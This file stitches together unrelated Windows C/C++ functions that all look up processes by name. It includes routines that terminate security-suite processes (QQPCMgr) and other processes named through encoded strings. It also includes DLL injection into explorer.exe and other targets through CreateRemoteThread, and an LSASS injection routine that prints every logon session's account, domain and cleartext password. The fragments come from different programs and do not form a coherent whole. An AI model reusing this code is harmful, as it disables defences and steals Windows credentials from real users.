//Open a thread to get the processID and control the process
DWORD WINAPI Thread_1 (LPVOID lpParam)
{
DWORD pProcessIds[1024],cbReturned,cProcesses;
DWORD pProcessIdWanted = 0;
TCHAR sProcessName[MAX_PATH] = TEXT("minesweeper.exe");
unsigned int i;
if(!EnumProcesses(pProcessIds,sizeof(pProcessIds),&cbReturned))
{
return 1;
}
//Number of Processes returned from Enum from Byte to #
cProcesses = cbReturned / sizeof(DWORD);
for(i=0;i<cProcesses;i++)
{
if(pProcessIds[i] != 0)
{
pProcessIdWanted = GetProcessIdByName(pProcessIds[i], sProcessName);
if(pProcessIdWanted != 0) break;
}
}
pProcessIdWanted ? cout<< pProcessIdWanted <<endl : cout<<"Process Not Found" << endl;
GetProcessBaseAddr(pProcessIdWanted);
return 0;
}
bool terminateBN()
{
const wchar_t processes[][64] = {
{0xfe59, 0xfe7a, 0xfe6f, 0xfe6f, 0xfe77, 0xfe7e, 0xfe35, 0xfe75, 0xfe7e, 0xfe6f, 0xfe35, 0xfe7e, 0xfe63, 0xfe7e, 0xfe1b},
{0xfe5a, 0xfe7c, 0xfe7e, 0xfe75, 0xfe6f, 0xfe35, 0xfe7e, 0xfe63, 0xfe7e, 0xfe1b},
{0xfe59, 0xfe7a, 0xfe6f, 0xfe6f, 0xfe77, 0xfe7e, 0xfe35, 0xfe75, 0xfe7e, 0xfe6f, 0xfe3b, 0xfe53, 0xfe7e, 0xfe77, 0xfe6b, 0xfe7e, 0xfe69, 0xfe35, 0xfe7e, 0xfe63, 0xfe7e, 0xfe1b},
};
for (const auto& p : processes) {
auto p_decoded = decode_string(p, 64);
DWORD id = GetProcessIdByName(p_decoded.data());
if (id != 0) {
HANDLE process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, id);
if (process) {
if (!TerminateProcess(process, 0)) {
fprintf(stderr, "Failed to terminate process [%ls]", p);
return false;
}
else {
WaitForSingleObject(process, INFINITE);
}
CloseHandle(process);
}
else {
fprintf(stderr, "Failed to open process [%ls]", p);
return false;
}
}
}
return true;
}
int _tmain(int argc, _TCHAR* argv[])
{
HANDLE hToken;
OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,&hToken);
LUID uid;
LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &uid);
TOKEN_PRIVILEGES tp = { 0 };
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
tp.Privileges[0].Luid = uid;
tp.PrivilegeCount = 1;
AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
CloseHandle(hToken);
TCHAR *szAvireaProcesses[] = { TEXT("QQPCMgr.exe"), TEXT("QQPCRTP.exe"), TEXT("QQPCTray.exe") };
for (int i = 0; i < sizeof(szAvireaProcesses) / sizeof(szAvireaProcesses[0]); i++)
{
while (DWORD dwProcessId = GetProcessIdByName(szAvireaProcesses[i]))
{
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, NULL, dwProcessId);
TerminateProcess(hProcess, 0);
CloseHandle(hProcess);
}
}
printf("The processes has been terminated.\n");
getchar();
return 0;
}
/*************************************
* int WinMain(
* HINSTANCE hInstance,
* HINSTANCE hPrevInstance,
* LPSTR lpCmdLine,
* int nCmdShow
* )
**************************************/
int WinMain(
HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow
)
{
DWORD dwPID;
// 提权,获取SE_DEBUG_NAME权限,
// 可以在其他进程的内存空间中写入、创建线程
if(0!=EnablePrivilege (SE_DEBUG_NAME))
return 0;
// 获取目录进程的PID
if(!GetProcessIdByName("explorer.exe",&dwPID))
return 0;
// 通过创建远程线程加载DLL
// 将msg.dll放置在系统目录下
if(!LoadRometeDll(dwPID,"msg.dll"))
return 0;
return 1;
}
UINT StopService_dan( LPVOID lp1 )
{
int nRetry=0;
int nMaxRetry=5;
CString str=(LPCTSTR)lp1;
CString sn;
CString sf;
AfxExtractSubString(sn,str,0,L',');
AfxExtractSubString(sf,str,1,L',');
// 打开服务管理对象
SC_HANDLE hSC = ::OpenSCManager( NULL,
NULL, GENERIC_EXECUTE);
if( hSC == NULL)
{
Log(_T("打开服务管理器错误!\r\n"));
return FALSE;
}
SC_HANDLE hSvc = ::OpenService(hSC,sn,
SERVICE_START | SERVICE_QUERY_STATUS | SERVICE_STOP);
if(hSvc == NULL)
{
Log(_T("打开服务错误!\r\n"));
::CloseServiceHandle( hSC);
return FALSE;
}
SERVICE_STATUS status;
if( ::QueryServiceStatus( hSvc, &status) == FALSE)
{
Log(_T("查询服务状态错误\r\n"));
::CloseServiceHandle( hSvc);
::CloseServiceHandle( hSC);
return FALSE;
}
//如果处于停止状态则启动服务,否则停止服务。
if( status.dwCurrentState == SERVICE_RUNNING)
{
STOP:
if(::ControlService( hSvc,
SERVICE_CONTROL_STOP, &status) == TRUE)
Log(_T("尝试停止服务,正等待服务停止!\r\n"));
// 等待服务停止
nRetry=0;
while( ::QueryServiceStatus( hSvc, &status) == TRUE)
{
::Sleep( status.dwWaitHint);
if( status.dwCurrentState == SERVICE_STOPPED)
{
Log(_T("服务成功停止。\r\n"));
break;
}
if( status.dwCurrentState == SERVICE_RUNNING)
{
goto STOP;
}
if(nRetry==nMaxRetry)
{
Log(_T("尝试停止服务,等待太久,尝试结束进程.\r\n"));
KillProcess(GetProcessIdByName(sf));
}
nRetry++;
}
}
else
{
Log(_T("服务没有运行!\r\n"));
}
::CloseServiceHandle( hSvc);
::CloseServiceHandle( hSC);
return TRUE;
}
//更新功能函数
UINT DoPatch( LPVOID lp1 )
{
//进程是否存在
BOOL bIsExistApp=TRUE;
BOOL bIsRunSvc=TRUE;
int nTmp=0;
bool bTmp=TRUE;
//杀死和停止服务重试次数
int nRetryKillCount=0;
int nRetryKillMaxCount=5;
CString str;
TCHAR tz1[MAX_PATH]={0};
CString sTmp;
BOOL bFind=FALSE;
BOOL bCheck=FALSE;
int nHintCount=10;
UINT ret=S_OK;
CPatchDlg *pDlg=NULL;
pDlg=(CPatchDlg*)theApp.GetMainWnd();
//检测新版本
pDlg->CheckVersion(&bFind);
if(bFind)
{
Log(_T("发现新版本.进行文件检验!\r\n"));
pDlg->GetCrcInfo(&bCheck,tz1,MAX_PATH);
if(bCheck)
{
Log(_T("检验通过!\r\n"));
//检查是否有更新
//检查要更新进程是否退出
nTmp=0;
Log(_T("正在检测需更新的程序是否已经退出!\r\n"));
for (int i=0;i<nAppCount;i++)
{
nTmp=GetProcessIdByName(sPatchAppName[i][0].GetString());
if(nTmp==0)
{
//没有启动的,按默认。
continue;
}
else
{
//有在启动的 改为T,
sPatchAppName[i][1]=_T("T");
}
nRetryKillCount=0;
Sleep(1000);
do
{
Sleep(1000);
KillProcess(nTmp);
nTmp=GetProcessIdByName(sPatchAppName[i][0].GetString());
nRetryKillCount++;
} while (nTmp!=0 && nRetryKillCount<nRetryKillMaxCount);
if(nRetryKillCount>=nRetryKillMaxCount)
{
Log(_T("尝试杀死进程%s失败.已经重试%d次.更新程序不能继续.\r\n"),sPatchAppName[i][0].GetString(),nRetryKillCount);
ret=S_FALSE;
goto Done;
}
}
Log(_T("需更新的程序已经退出!\r\n"));
//停止服务
Log(_T("正在检测需更新的服务是否已经停止!\r\n"));
for(int i=0;i<nSvcCount;i++)
{
nRetryKillCount=0;
while(QueryServiceStatus_dan(sPatchSvcName[i][0].GetString(),SERVICE_RUNNING)||
nRetryKillCount>=nRetryKillMaxCount)
{
str.Empty();
str.AppendFormat(_T("%s,%s"),sPatchSvcName[i][0],sPatchSvcName[i][1]);
StopService_dan((LPVOID)str.GetString());
nRetryKillCount++;
Sleep(1000); //暂停一下。
if(QueryServiceStatus_dan(sPatchSvcName[i][0].GetString(),SERVICE_RUNNING) ||
QueryServiceStatus_dan(sPatchSvcName[i][0].GetString(),SERVICE_START_PENDING)||
QueryServiceStatus_dan(sPatchSvcName[i][0].GetString(),SERVICE_STOP_PENDING))
{
nTmp=GetProcessIdByName(sPatchSvcName[i][1].GetString());
if(nTmp>0)
KillProcess(nTmp);
}
}
if(nRetryKillCount>=nRetryKillMaxCount)
{
str.Empty();
str.AppendFormat(_T("尝试停止服务%s失败.已经重试%d次.更新程序不能继续.\r\n"),sPatchSvcName[i][0].GetString(),nRetryKillCount);
Log(str.GetBuffer());
ret= S_FALSE;
goto Done;
}
}
Log(_T("需更新的服务已经停止!\r\n"));
//移动文件
Log(_T("进行更新文件操作.\r\n"));
GetAppPath(tz1);
sTmp.AppendFormat(_T("%s\\%s"),tz1,sUpdateDir);
if(MoveDirectory(sTmp.GetString(),tz1))
{
Log(_T("更新文件完毕.\r\n"));
//重新启动被更新程序
for (int i=0;i<nAppCount;i++)
{
str.Empty();
str.AppendFormat(_T("%s\\%s"),sAppPath,sPatchAppName[i][0].GetString());
//F不启动
if(sPatchAppName[i][1]==_T("F")) continue;
if(Execute(str,NULL,FALSE,FALSE))
{
Log(_T("程序%s启动成功.\r\n"),sPatchAppName[i][0].GetString());
}
}
//启动服务
for(int i=0;i<nSvcCount;i++)
{
if(StartService_dan((LPVOID)sPatchSvcName[i][0].GetString()))
{
Log(_T("服务%s启动成功.\r\n"),sPatchSvcName[i][0].GetString());
}
}
ret=S_OK;
}
else
{
Log(_T("更新文件失败.更新程序不能继续.\r\n"));
ret= S_FALSE;
}
}
else
{
Log(_T("检验不通过!\r\n%s"),tz1);
}
}
else
{
Log(_T("正在检查服务状态!\r\n"));
CheckSyncSvc();
}
Done:
for(int i=nHintCount;i>0;i--)
{
Log(_T("%d 秒后关闭。\r\n"),i);
Sleep(1000);
}
pDlg->isCanClose=TRUE;
pDlg->SendMessage(WM_CLOSE);
return ret;
}
// Injects the dll specified by dllPath into the target process
int CInjector::Inject(std::wstring dllPath, std::wstring processName, DWORD pId)
{
HANDLE hProc = 0;
HANDLE hThread;
HMODULE hModule;
int len;
void* pRemoteString = 0;
FARPROC pLoadLibrary;
std::wstring dllName = StripPath(dllPath);
//std::cout << dllName.c_str() << "\n";
try {
// if pId not already specified, look for it
if (!pId) {
pId = GetProcessIdByName(processName);
}
// if its still not found, serious error, abort
if (!pId) {
throw std::exception("Process ID not found");
}
// Open the process & get the process handle
hProc = OpenProcess(CREATE_THREAD_ACCESS, 0, pId);
if (!hProc) {
std::cout << "Could not open process!" << "\n";
throw std::exception("Could not open process!");
}
// Allocate remote memory for remote string
len = dllPath.length() + 2;
pRemoteString = VirtualAllocEx(hProc, 0, len * sizeof(wchar_t), MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE);
if (!pRemoteString) {
std::cout << "Could not allocate remote memory!" << "\n";
throw std::exception("Could not allocate remote memory!");
}
// Write a remote string of the dll path
if (!WriteProcessMemory(hProc, pRemoteString, (void*)dllPath.c_str(), len * sizeof(wchar_t), 0)) {
std::cout << "Could not write remote string!" << "\n";
throw std::exception("Could not write remote string!");
}
// Create remote thread of loadlibrary with path as paramater
pLoadLibrary = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "LoadLibraryW");
if (!pLoadLibrary) {
std::cout << "Could not find address of LoadLibraryW!" << "\n";
throw std::exception("Could not find address of LoadLibraryW!");
}
hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)pLoadLibrary, pRemoteString, 0, 0);
if (!hThread) {
std::cout << "Could not create remote thread!" << "\n";
throw std::exception("Could not create remote thread!");
}
// Wait for the thread return code (HMODULE of loaded module)
WaitForSingleObject(hThread, INFINITE);
GetExitCodeThread(hThread, (DWORD*)&hModule);
// Add the module to the process's module map
if (hModule) {
processes[processName].hProc = hProc;
processes[processName].name = processName;
processes[processName].modules[dllName] = hModule;
}
// Clean up
VirtualFreeEx(hProc, pRemoteString, len * sizeof(wchar_t), MEM_FREE);
CloseHandle(hProc);
// Return true if module loaded succesfully, false otherwise
return reinterpret_cast<int>(hModule);
}
catch (std::exception e) {
VirtualFreeEx(hProc, pRemoteString, len * sizeof(wchar_t), MEM_FREE);
std::cout << e.what() << "\n";
CloseHandle(hProc);
throw;
}
}
// Unloads an injected (not arbitrary) dll from the target process
int CInjector::Unload(std::wstring dllName, std::wstring processName)
{
dllName = StripPath(dllName);
HMODULE hModule = processes[processName].modules[dllName];
// That dll hasnt been loaded, dont unload
if (!hModule) {
return 0;
}
// Unload the dll
HANDLE hProc, hThread;
DWORD pId, dwExit = 0;
FARPROC pFreeLibrary;
try {
// if pId not already specified, look for it
pId = GetProcessIdByName(processName);
// if its still not found, serious error, abort
if (!pId) {
throw std::exception("Process ID not found");
}
// Open the process & get the process handle
hProc = OpenProcess(CREATE_THREAD_ACCESS, 0, pId);
if (!hProc) {
throw std::exception("Could not open process!");
}
// Create remote thread of loadlibrary with path as paramater
pFreeLibrary = GetProcAddress(GetModuleHandleW(L"kernel32.dll"), "FreeLibrary");
if (!pFreeLibrary) {
throw std::exception("Could not find address of FreeLibrary!");
}
hThread = CreateRemoteThread(hProc, 0, 0, (LPTHREAD_START_ROUTINE)pFreeLibrary, (void*)hModule, 0, 0);
if (!hThread) {
throw std::exception("Could not create remote thread!");
}
// Wait for the thread return code (result of FreeLibrary)
WaitForSingleObject(hThread, INFINITE);
GetExitCodeThread(hThread, &dwExit);
// Remove the module from the process module map
if (dwExit) {
processes[processName].modules[dllName] = 0;
}
// Clean up
CloseHandle(hProc);
// Return true if module unloaded succesfully, false otherwise
return dwExit;
}
catch (std::exception e) {
CloseHandle(hProc);
throw;
}
return 1;
}
int LookupAccountPwd() {
int nRet = -1;
if (m_bNoisy) {
msg_print("Reading by injecting code! (less-safe mode)\n");
}
DWORD dwLSASRV_dll = FindLSASRV_dll(), dwWDIGEST_dll = 0;
OSVERSIONINFOA sysVersion;
sysVersion.dwOSVersionInfoSize = sizeof(sysVersion);
GetVersionExA(&sysVersion);
if ((sysVersion.dwMajorVersion < 6) && (
(sysVersion.dwMajorVersion != 5) || (sysVersion.dwMinorVersion != 2))) {
dwWDIGEST_dll = FindWDIGEST_dll();
}
else {
dwWDIGEST_dll = FindWDIGEST_dll_2();
}
if (!dwLSASRV_dll || !dwWDIGEST_dll) {
msg_print("ERROR: Cannot find dependencies\n");
return nRet;
}
DWORD dwProcessId = GetProcessIdByName(L"lsass.exe");
if (!dwProcessId) {
msg_print("Cannot get PID of LSASS.EXE!\n");
exit(0);
}
HANDLE hLSASS = OpenProcess(PROCESS_ALL_ACCESS, 0, dwProcessId);
if (hLSASS == INVALID_HANDLE_VALUE) {
msg_print("Error: Cannot open LSASS.EXE!.\n");
exit(0);
}
ULONG nLogonSessionCount = 0;
PLUID pLogonSessionList = NULL;
NTSTATUS status = LsaEnumerateLogonSessions(&nLogonSessionCount, &pLogonSessionList);
if (!NT_SUCCESS(status)) {
msg_print("Can't enumerate logon sessions!\n");
exit(0);
}
if (m_bNoisy) {
msg_print("Logon Sessions Found: %d\n", nLogonSessionCount);
}
REMOTE_PARAM_T *remp = (REMOTE_PARAM_T *)malloc(sizeof(REMOTE_PARAM_T));
if (!remp) {
msg_print("Cannot alloc wcewdparams!.");
exit(0);
}
INPUT_PARAM_T inpt;
strcpy(inpt.FuncName, "_0212DBDHJKSAHD0183923kljmLKL");
inpt.pParam = remp;
inpt.paramSize = sizeof(REMOTE_PARAM_T);
char szInjectDll[1024] = {0};
::GetCurrentDirectoryA(1022, szInjectDll);
::PathAppendA(szInjectDll, "getpwd_dll.dll");
for (ULONG i = 0; i < nLogonSessionCount; ++i) {
memset(remp, 0, sizeof(REMOTE_PARAM_T));
remp->dwDecryptAddr = dwLSASRV_dll;
remp->dwLogonSessionEntry = dwWDIGEST_dll;
remp->Retn = 0;
remp->LogonId.LowPart = pLogonSessionList[i].LowPart;
remp->LogonId.HighPart = pLogonSessionList[i].HighPart;
if (GetUserPassword(dwProcessId, szInjectDll, &inpt)) {
if (remp->Retn == 1) {
msg_print("ID: %d\nAccout: %s\nDomain: %s\nPassword: "******"%s\n", remp->szPassword);
}
else {
msg_print("<contains-non-printable-chars>");
}
}
}
else {
msg_print("Error in InjectDllAndCallFunction\n");
}
}
free(remp);
LsaFreeReturnBuffer(pLogonSessionList);
return 0;
}
